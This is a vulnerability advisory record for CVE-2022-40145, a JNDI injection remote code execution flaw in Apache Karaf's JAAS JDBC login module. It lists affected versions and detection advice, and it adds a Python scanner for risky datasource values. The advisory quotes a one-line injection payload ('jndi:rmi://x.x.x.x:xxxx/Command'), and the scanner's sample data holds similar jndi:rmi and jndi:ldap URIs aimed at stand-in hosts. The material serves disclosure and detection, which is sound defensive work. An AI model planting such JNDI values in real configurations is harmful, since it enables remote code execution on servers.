CVE-2022-40145
published 2022-12-21


Priority: P2 · 61 · critical 9.8 (CVSS 3.1)
CVSS vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
EPSS: 2.40% (82.0th percentile)
This vulnerability is a potential code injection when an attacker controls the target LDAP server used in the JDBC JNDI URL. The function jaas.modules.src.main.java.org.apache.karaf.jaas.modules.jdbc.JDBCUtils#doCreateDatasource uses InitialContext.lookup(jndiName) without filtering. A user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI and an attacker has control of the target LDAP server. This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8.

Affected

4 ranges

Vendor                      | Product       | Version range       | Fixed in
apache                      | karaf         | < 4.3.8             | 4.3.8
apache                      | karaf         | >= 4.4.0, < 4.4.2   | 4.4.2
apache_software_foundation  | apache_karaf  | < 4.3.8             | 4.3.8
apache_software_foundation  | apache_karaf  | >= 4.4.0, < 4.4.2   | 4.4.2

Detection & IOCs (extracted from sources)

command: options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");
  • Monitor for JNDI RMI or LDAP URIs supplied as JDBC datasource configuration values in Apache Karaf JAAS JDBC login module options (JDBCUtils.DATASOURCE), particularly schemes such as jndi:rmi:// or jndi:ldap:// pointing to external hosts.
  • Audit calls to InitialContext.lookup(jndiName) within org.apache.karaf.jaas.modules.jdbc.JDBCUtils#doCreateDatasource for unsanitised, externally controlled JNDI names: the absence of input filtering here is the root cause of the RCE.
  • Flag outbound RMI (TCP/1099 or high ephemeral RMI ports) and LDAP (TCP/389, TCP/636) connections originating from Apache Karaf JVM processes, which may indicate JNDI injection exploitation in progress.
  • Exploitation requires the attacker to already control the target LDAP/RMI server referenced in the JNDI URI; this prerequisite reduces exploitability compared to fully unauthenticated RCE.
  • All Apache Karaf versions up to and including 4.4.1 and 4.3.7 are affected; versions 4.4.2 and 4.3.8 contain the fix.
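An added example, not part of this record or of Apache Karaf, of the first detection point above: a small Python scan over JAAS JDBC login module options in Karaf's `key = value` form that classifies each `datasource` value, accepting the `osgi:` service form and flagging `jndi:` lookups whose scheme would reach a remote RMI/LDAP host. The option text, hosts and the "review"/"critical" labels are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Constructed sample of Karaf JAAS JDBC login module options (key = value lines,
# as they appear inside a <jaas:module> element); hosts are documentation addresses.
SAMPLE_OPTIONS = """
datasource = osgi:javax.sql.DataSource/(osgi.jndi.service.name=jdbc/karafdb)
query.password = SELECT PASSWORD FROM USERS WHERE USERNAME=?
datasource = jndi:rmi://203.0.113.10:1099/Command
datasource = jndi:ldap://attacker.example/a
datasource = jndi:java:comp/env/jdbc/karafdb
"""

# JNDI URL schemes that make InitialContext.lookup() contact a network service.
REMOTE_SCHEMES = {"rmi", "ldap", "ldaps", "iiop"}
LOCAL_HOSTS = {"", "localhost", "127.0.0.1", "::1"}


def classify_datasource(value):
    """Return (risk, reason) for one JDBCUtils.DATASOURCE option value."""
    value = value.strip()
    if value.startswith("osgi:"):
        return ("ok", "OSGi service reference, no JNDI network lookup")
    if not value.startswith("jndi:"):
        return ("review", "unrecognised datasource form")
    target = value[len("jndi:"):]
    scheme = target.partition(":")[0].lower()
    if scheme not in REMOTE_SCHEMES:
        return ("review", f"JNDI name with non-network scheme {scheme!r}")
    host = (urlsplit(target).hostname or "").lower()
    if host in LOCAL_HOSTS:
        return ("review", f"JNDI {scheme} lookup against the local host")
    return ("critical", f"JNDI {scheme} lookup against remote host {host}")


def scan_options(text):
    """Scan option text; return (line_no, risk, reason) for each datasource entry."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = re.match(r"\s*datasource\s*=\s*(.+)$", line)
        if m:
            risk, reason = classify_datasource(m.group(1))
            findings.append((line_no, risk, reason))
    return findings


if __name__ == "__main__":
    for line_no, risk, reason in scan_options(SAMPLE_OPTIONS):
        print(f"line {line_no}: {risk:8} {reason}")
```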

CVSS provenance

nvd: v3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vendor_redhat: 9.8 CRITICAL